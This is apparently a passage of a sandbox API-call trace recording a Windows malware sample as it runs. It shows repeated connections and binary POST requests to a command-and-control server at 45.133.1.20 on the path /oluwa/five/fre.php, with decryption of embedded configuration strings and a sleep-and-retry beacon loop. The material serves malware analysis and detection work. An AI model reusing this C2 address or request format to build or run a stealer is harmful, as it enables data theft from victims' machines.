pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0232.496] GetProcessHeap () returned 0x6a0000 [0232.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0232.496] socket (af=2, type=1, protocol=6) returned 0x720 [0232.496] connect (s=0x720, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0232.522] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0232.523] GetProcessHeap () returned 0x6a0000 [0232.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0232.523] GetProcessHeap () returned 0x6a0000 [0232.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf28 [0232.523] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0232.525] wvsprintfA (in: param_1=0x6daf28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0232.525] GetProcessHeap () returned 0x6a0000 [0232.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bfe18 [0232.525] GetProcessHeap () returned 0x6a0000 [0232.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0232.526] GetProcessHeap () returned 0x6a0000 [0232.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0232.526] GetProcessHeap () returned 0x6a0000 [0232.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6daf28 [0232.526] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0232.527] wvsprintfA (in: param_1=0x6daf28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0232.527] GetProcessHeap () returned 0x6a0000 [0232.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0232.527] GetProcessHeap () returned 0x6a0000 [0232.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0232.528] send (s=0x720, buf=0x6bd460*, len=242, flags=0) returned 242 [0232.528] send (s=0x720, buf=0x6bb998*, len=159, flags=0) returned 159 [0232.528] GetProcessHeap () returned 0x6a0000 [0232.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0232.528] recv (in: s=0x720, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0232.601] GetProcessHeap () returned 0x6a0000 [0232.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0232.601] GetProcessHeap () returned 0x6a0000 [0232.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0232.602] GetProcessHeap () returned 0x6a0000 [0232.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bfe18 | out: hHeap=0x6a0000) returned 1 [0232.602] GetProcessHeap () returned 0x6a0000 [0232.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0232.602] closesocket (s=0x720) returned 0 [0232.603] GetProcessHeap () returned 0x6a0000 [0232.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0232.603] GetProcessHeap () returned 0x6a0000 [0232.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0232.604] GetProcessHeap () returned 0x6a0000 [0232.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0232.605] GetProcessHeap () returned 0x6a0000 [0232.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0232.606] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1454) returned 0x720 [0232.608] Sleep (dwMilliseconds=0xea60) [0232.609] GetProcessHeap () returned 0x6a0000 [0232.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0232.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.610] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0232.615] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.616] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0232.622] GetProcessHeap () returned 0x6a0000 [0232.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6d8890 [0232.623] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.623] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6d8890, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0232.624] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.624] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0232.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.625] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0232.625] GetProcessHeap () returned 0x6a0000 [0232.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8890 | out: hHeap=0x6a0000) returned 1 [0232.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.627] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0232.628] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.628] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0232.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.629] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0232.629] GetProcessHeap () returned 0x6a0000 [0232.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0232.630] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.630] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0232.631] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.631] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0232.632] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.632] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0232.633] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.633] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0232.633] GetProcessHeap () returned 0x6a0000 [0232.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0232.633] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0232.633] GetProcessHeap () returned 0x6a0000 [0232.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0232.634] GetProcessHeap () returned 0x6a0000 [0232.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0232.634] GetProcessHeap () returned 0x6a0000 [0232.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0232.635] GetProcessHeap () returned 0x6a0000 [0232.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0232.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.638] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0232.643] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.643] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0232.649] GetProcessHeap () returned 0x6a0000 [0232.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0232.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.650] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0232.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.651] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0232.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.652] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0232.652] GetProcessHeap () returned 0x6a0000 [0232.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0232.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.653] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0232.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.654] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0232.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.655] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0232.655] GetProcessHeap () returned 0x6a0000 [0232.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0232.656] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.656] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0232.657] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.657] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0232.658] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.659] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0232.659] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.660] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0232.660] GetProcessHeap () returned 0x6a0000 [0232.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0232.660] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0232.660] GetProcessHeap () returned 0x6a0000 [0232.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baae0 [0232.660] socket (af=2, type=1, protocol=6) returned 0x724 [0232.660] connect (s=0x724, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0232.683] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0232.683] GetProcessHeap () returned 0x6a0000 [0232.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0232.683] GetProcessHeap () returned 0x6a0000 [0232.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf28 [0232.684] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0232.684] wvsprintfA (in: param_1=0x6daf28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0232.684] GetProcessHeap () returned 0x6a0000 [0232.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bf758 [0232.684] GetProcessHeap () returned 0x6a0000 [0232.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0232.685] GetProcessHeap () returned 0x6a0000 [0232.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0232.685] GetProcessHeap () returned 0x6a0000 [0232.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d7f08 [0232.686] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0232.687] wvsprintfA (in: param_1=0x6d7f08, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0232.687] GetProcessHeap () returned 0x6a0000 [0232.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0232.687] GetProcessHeap () returned 0x6a0000 [0232.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0232.687] send (s=0x724, buf=0x6bd460*, len=242, flags=0) returned 242 [0232.688] send (s=0x724, buf=0x6bb998*, len=159, flags=0) returned 159 [0232.688] GetProcessHeap () returned 0x6a0000 [0232.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d7f08 [0232.688] recv (in: s=0x724, buf=0x6d7f08, len=4048, flags=0 | out: buf=0x6d7f08*) returned 204 [0232.771] GetProcessHeap () returned 0x6a0000 [0232.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0232.772] GetProcessHeap () returned 0x6a0000 [0232.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0232.775] GetProcessHeap () returned 0x6a0000 [0232.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf758 | out: hHeap=0x6a0000) returned 1 [0232.776] GetProcessHeap () returned 0x6a0000 [0232.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0232.777] closesocket (s=0x724) returned 0 [0232.777] GetProcessHeap () returned 0x6a0000 [0232.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baae0 | out: hHeap=0x6a0000) returned 1 [0232.777] GetProcessHeap () returned 0x6a0000 [0232.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0232.778] GetProcessHeap () returned 0x6a0000 [0232.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0232.779] GetProcessHeap () returned 0x6a0000 [0232.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0232.780] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d7f08, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1458) returned 0x724 [0232.781] Sleep (dwMilliseconds=0xea60) [0232.783] GetProcessHeap () returned 0x6a0000 [0232.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0232.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.784] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0232.790] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.790] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0232.798] GetProcessHeap () returned 0x6a0000 [0232.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6d8f70 [0232.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.800] CryptImportKey (in: hProv=0x6bed28, pbData=0x6d8f70, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0232.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.801] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0232.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.802] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0232.802] GetProcessHeap () returned 0x6a0000 [0232.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f70 | out: hHeap=0x6a0000) returned 1 [0232.803] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.804] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0232.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.805] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0232.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.805] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0232.806] GetProcessHeap () returned 0x6a0000 [0232.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0232.806] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.806] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0232.807] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.807] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0232.808] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.808] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0232.809] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.809] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0232.809] GetProcessHeap () returned 0x6a0000 [0232.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0232.811] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0232.811] GetProcessHeap () returned 0x6a0000 [0232.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0232.811] GetProcessHeap () returned 0x6a0000 [0232.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0232.812] GetProcessHeap () returned 0x6a0000 [0232.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0232.812] GetProcessHeap () returned 0x6a0000 [0232.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0232.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.813] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0232.817] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.818] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0232.824] GetProcessHeap () returned 0x6a0000 [0232.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0232.824] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.825] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0232.825] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.826] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0232.826] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.827] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0232.827] GetProcessHeap () returned 0x6a0000 [0232.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0232.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.828] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0232.829] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.829] CryptDestroyKey (hKey=0x6ad020) returned 1 [0232.830] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.830] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0232.830] GetProcessHeap () returned 0x6a0000 [0232.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0232.831] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.831] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0232.832] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.832] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0232.833] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.833] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0232.834] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0232.834] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0232.834] GetProcessHeap () returned 0x6a0000 [0232.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0232.834] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0232.834] GetProcessHeap () returned 0x6a0000 [0232.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa00 [0232.834] socket (af=2, type=1, protocol=6) returned 0x728 [0232.834] connect (s=0x728, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0232.864] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, 